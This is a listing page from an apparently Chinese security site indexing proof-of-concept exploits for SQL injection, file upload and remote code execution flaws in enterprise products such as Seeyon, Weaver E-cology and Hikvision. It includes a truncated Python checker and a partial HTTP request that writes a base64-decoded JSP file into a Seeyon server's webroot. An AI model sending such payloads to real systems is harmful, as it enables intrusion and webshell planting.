POC 第19页
汇智ERP-filehandle.aspx存在任意文件读取漏洞_秃兔安全
泛微E-cology9 browserjsp SQL注入漏洞_秃兔安全

泛微E-cology9 browserjsp SQL注入漏洞

import argparseimport requestsfrom termcolor import coloredimport signal requests.packages.urllib3.disable_warnings()output_file = None def check_url(url, output=None):headers = {...
秃兔的头像_秃兔安全至尊玉兔秃兔5个月前
06015
用友-畅捷通CRM-任意文件上传_秃兔安全
金慧-综合管理信息系统-SQL注入_秃兔安全
【通用】宏景EHR searchCreatPlanList.do存在SQL注入_秃兔安全

【通用】宏景EHR searchCreatPlanList.do存在SQL注入

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921个月前
0609
【通用】 杜特网上订单系统getUserImage SQL注入漏洞_秃兔安全

【通用】 杜特网上订单系统getUserImage SQL注入漏洞

fofa 语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
dreamer292的头像_秃兔安全至尊玉兔dreamer2925个月前
06010
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔5个月前
06013
H3C-CVM-upload接口前台任意文件上传漏洞_秃兔安全
【通用】 海康威视运行管理中心applyST远程代码执行漏洞_秃兔安全

【通用】 海康威视运行管理中心applyST远程代码执行漏洞

fofa 语句yakit插件uuidpocyakit && nuclei yaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2925个月前
05912
紫光-电子档案管理系统-PermissionAC_秃兔安全